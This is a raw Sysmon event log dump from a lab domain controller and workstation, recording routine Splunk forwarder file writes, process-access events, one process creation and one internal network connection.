23542300x8000000000000000216068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:42.186{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F783EF670BBB63C824EDBFD36CE50C70,SHA256=3D945DA98CB95172676C874EF0891E4C5660FE2E14F16D54623363BADFB63132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:43.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D04CDE7C2C22CA18B889008EB3C60CE,SHA256=12A809074310BB5A25C684821777BEB151CB8E9DF04E422D32984226C6445099,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:43.201{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3312D9CF2274A200317B515445960C18,SHA256=4BAEE098EED88F2E807CA7119CB74F6ED6AFB024B7C26CB4DB25DCB6C321FF76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.844{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.844{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.735{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000287173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.625{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.625{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.531{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2141368203CD2E881D1CB61909448B60,SHA256=B391AC0D5065C4511E790B18890EDA2A36C58E9DB09E8BB218574043B079E215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:44.217{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9DF93C2D960BC008A4D84293DE94074,SHA256=1E10DA0B99D4887681EB2362AC5F9D934B4557F2789D967D11B720CA2380D601,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:45.766{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C89ADB0FDCB5CC5F85EEE40A2DE5F2F,SHA256=216279F2FC2151170F8A50705241F7E44DFF9CE0FCCE4226F4447102D1B7F36A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:45.766{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE83F6CC28E14AEE7C9CBF36549C78E9,SHA256=C0BF0ADCAEEF81481407FAE99DF387293EABF2950C7B9319A54149020DF77EE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:45.688{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E9EE982D17BAC4E731B4C4E0E91A195,SHA256=10A876AB8FCE46E23BF9A66A624FBB116898CACE10B5C80B3BD59B0B9E0960D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.936{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-10D1-6216-4304-000000003902}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-10D1-6216-4304-000000003902}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.717{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-10D1-6216-4304-000000003902}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.718{4F8D34B0-10D1-6216-4304-000000003902}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000216086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.529{4F8D34B0-10D1-6216-4204-000000003902}31843460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.483{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F6B2604C1A867AED990598B72E587ED,SHA256=0144C7D18EEB79F19FFEE7EF6033549E8C7572938E88EF042198F954E239BBAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:42.476{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53391-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000216084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-10D1-6216-4204-000000003902}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.D